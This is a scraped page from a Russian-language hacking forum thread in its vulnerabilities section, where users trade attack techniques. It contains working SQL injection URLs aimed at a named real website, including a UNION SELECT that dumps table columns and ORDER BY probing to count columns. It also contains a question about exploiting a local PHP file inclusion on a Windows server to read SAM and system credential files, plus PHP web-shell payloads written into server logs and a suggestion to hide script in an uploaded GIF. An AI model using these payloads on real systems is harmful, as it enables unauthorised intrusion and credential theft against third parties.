ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #971  
Старый 16.02.2008, 22:55
Аватар для ZAMUT
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523

Репутация: 1174
По умолчанию

Ищи табы, потом колонки.
Вот что нашел я:
Код:
http://www.umpcportal.com/products/product.php?id=-1+union+select+concat_ws(0x3a,id,name,status)+from+products/*
 
Ответить с цитированием

  #972  
Старый 16.02.2008, 22:58
Аватар для Велемир
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

Как их искать,если не знаешь,какие(я про таблицы).
 
Ответить с цитированием

  #973  
Старый 16.02.2008, 22:59
Аватар для Scipio
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

Цитата:
Сообщение от Велемир  
Не пойму каким макаром ты подбирал,я через order by пробывал
ОМГ,
http://www.umpcportal.com/products/product.php?id=-161+order+by+38/*
обрати внимание на ошибку вверху страницы

http://www.umpcportal.com/products/product.php?id=-161+order+by+37/*
обрати внимание, что ошибки нет
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #974  
Старый 16.02.2008, 23:05
Аватар для Велемир
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

Да вот ща ток заметил,там хрен разберёшь- столько ошибок хоть убейсо:Р
 
Ответить с цитированием

  #975  
Старый 16.02.2008, 23:11
Аватар для Велемир
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

У мя такое ощущение,что есть список таблиц этой версии,ибо сбрутить или догадаться самому это анриал =__________=
 
Ответить с цитированием

  #976  
Старый 17.02.2008, 01:20
Аватар для bobob
bobob
Участник форума
Регистрация: 02.06.2006
Сообщений: 241
Провел на форуме:
1703454

Репутация: 142
По умолчанию

лол

есть просто списки как при бруте паса по словарю вот и все, а как назвать таблу - это дело владельца дб

эт всёравно что сказать - есть список всех пасов от инета
 
Ответить с цитированием

  #977  
Старый 17.02.2008, 02:51
Аватар для Велемир
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

Гггг))))).Ясн,всем спасиб :РР
 
Ответить с цитированием

  #978  
Старый 18.02.2008, 05:43
Аватар для o3,14um
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию

у меня вопрос: что можно сделать с локальным пхп-инклудом, если:
+инклуд лога я запарол, тепрь там ошибка (error.log и access.log, других там нет).
+загружать на сервер нифига нельзя.
+стоит винда, могу прочесть файлы WINDOWS\repair\sam и C:\WINDOWS\repair\system, но конечно же если их сохранять через страницу - расшифровать их неудастся - повредится структура.
+проверял файл тоталкоммандера - его там нет.
+БД там стоит ibase

Посоветуйте что-нить дельное. Благодарствую!

Последний раз редактировалось o3,14um; 18.02.2008 в 05:48..
 
Ответить с цитированием

  #979  
Старый 18.02.2008, 05:58
Аватар для Scipio
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

ты уверен, что там локальный инклюд? посмотри еслть ли возможность заливать какие нибудь файлы, картинки и т.п. например аватары залей тогда гифку со скриптом и попробуй ее проинклюдть
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #980  
Старый 18.02.2008, 16:20
Аватар для o3,14um
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию

я же говорю, нихрена нельзя заливать. 100% локальный инклуд.
мот кто знает БД ibase в каком файле пароли хранятся? Щас поищу в инете этот серв, буду сам разбираться, но всерано оставляйте свои предложения.

И Ещё: как правильно в логи шелл записывать? У себя на окалхосте я писал <?system($_POST[cmd])?> и писалось, а на том сервере пришлось вопросики урл-закодировать, но что-то не прокатило (шелл был вида <?include("http://shell")?>? нужно было делать такой <?system($_POST[cmd])?>, но я уже запорол... (пост - потомучто инклуд, с параметрами гет, там почемуто не инклудит - еррор выдает))

ошібка такая:
Parse error: parse error, unexpected T_STRING in C:\Program Files\ХХХ\Apache\logs\error.log on line 45831

Последний раз редактировалось o3,14um; 18.02.2008 в 16:44..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ